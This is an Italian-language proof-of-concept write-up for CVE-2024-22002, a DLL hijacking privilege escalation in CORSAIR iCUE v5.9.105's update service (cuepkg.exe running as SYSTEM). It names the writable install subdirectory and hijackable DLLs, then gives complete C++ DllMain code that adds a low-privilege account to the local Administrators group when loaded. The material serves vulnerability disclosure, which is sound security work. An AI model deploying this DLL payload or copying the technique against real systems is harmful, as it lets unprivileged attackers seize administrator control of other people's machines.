
Proof-of-concept per una vulnerabilità di escalation dei privilegi locali (CVE-2024-22002) in CORSAIR iCUE v5.9.105 tramite DLL hijacking durante il processo di aggiornamento, permettendo a utenti non privilegiati di ottenere privilegi SYSTEM.
È stata identificata una vulnerabilità di DLL Hijacking in iCUE v5.9.105. Questa vulnerabilità si verifica durante il processo di aggiornamento, gestito dal servizio "iCUEUpdateService". Il servizio avvia un processo ("cuepkg.exe") responsabile dell'esecuzione dell'aggiornamento, operando con privilegi "NT AUTHORITY\SYSTEM". Quando avvia il processo, cerca varie DLL nella directory \cuepkg-1.2.6, situata all'interno della directory di installazione di iCUE. Alcune di queste DLL non sono presenti per impostazione predefinita, ma poiché un utente normale ha i privilegi per creare file in quella directory, un aggressore potrebbe potenzialmente introdurre una DLL dannosa nella directory. Di conseguenza, questa DLL dannosa verrebbe caricata da cuepkg.exe con privilegi di Amministratore.
Le DLL rilevate affette sono le seguenti:
MSASN1.dllNTASN1.dllprofapi.dllVettore CVSS: (AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H)
Come esempio, verrà presa la DLL profapi.dll.
%INSTALLDIR%cuepkg-1.2.6.Privilegi dell'utente lowpriv prima dell'esecuzione della DLL dannosa:

Privilegi dell'utente lowpriv dopo l'esecuzione della DLL dannosa:

#include "pch.h"
#include <windows.h>
#include <cstdlib>
BOOL APIENTRY DllMain(HMODULE hModule, DWORD ul_reason_for_call, LPVOID lpReserved) {
switch (ul_reason_for_call) {
case DLL_PROCESS_ATTACH:
{
system("net localgroup Administrators desktop-ckfiane\\lowpriv /add");
}
break;
case DLL_PROCESS_DETACH:
break;
case DLL_THREAD_ATTACH:
break;
case DLL_THREAD_DETACH:
break;
}
return TRUE;
}